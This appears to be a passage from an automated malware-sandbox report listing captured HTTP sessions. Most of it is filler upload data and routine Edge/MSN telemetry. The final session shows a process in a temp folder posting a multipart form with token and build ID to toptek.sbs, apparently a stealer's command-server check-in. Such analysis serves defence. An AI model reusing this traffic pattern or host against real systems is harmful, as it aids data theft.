                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:37 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  31192.168.2.54994418.165.220.1104436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC925OUTGET /b?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:36 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:36 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  Location: /b2?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                  set-cookie: UID=19Abb18dd40861f844b83d11734931476; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                  set-cookie: XID=19Abb18dd40861f844b83d11734931476; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 5008327c23740ce2f9d9ed54c8a489e8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: uvhwVunuj2oo0YCJeez25CSirlcBbPzbqeWqPkv5IOlLLu5YkS7ErQ==


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  32192.168.2.54999420.42.73.244436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:37 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931474875&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 3869
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:37 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 32 34 3a 33 34 2e 38 37 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 66 35 39 31 39 39 2d 31 66 61 64 2d 34 64 64 65 2d 61 38 64 63 2d 37 37 65 62 36 30 66 62 64 66 32 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 31 35 33 32 34 30 31 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-23T05:24:34.871Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=c8e4d2d2ccd9454285f02bf017ed4ba4&HASH=c8e4&LV=202412&V=4&LU=1734931477888; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=cac78574556c43b9b90e6a86ee97d6fa; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3013
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:37 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  33192.168.2.550002108.139.47.924436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC1012OUTGET /b2?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: UID=19Abb18dd40861f844b83d11734931476; XID=19Abb18dd40861f844b83d11734931476
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:38 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 5b4b6c6517b988a4ff2c794e5583ee02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: du_ixGEvsRoarwYPXhDjrk2KlMmRgLr6poA921Czpx9P8FF3z0a4tA==


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  34192.168.2.55000494.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----J5PP8Q9ZUA1NYMY5FCTR
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 131557
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------J5PP8Q9ZUA1NYMY5FCTRCont
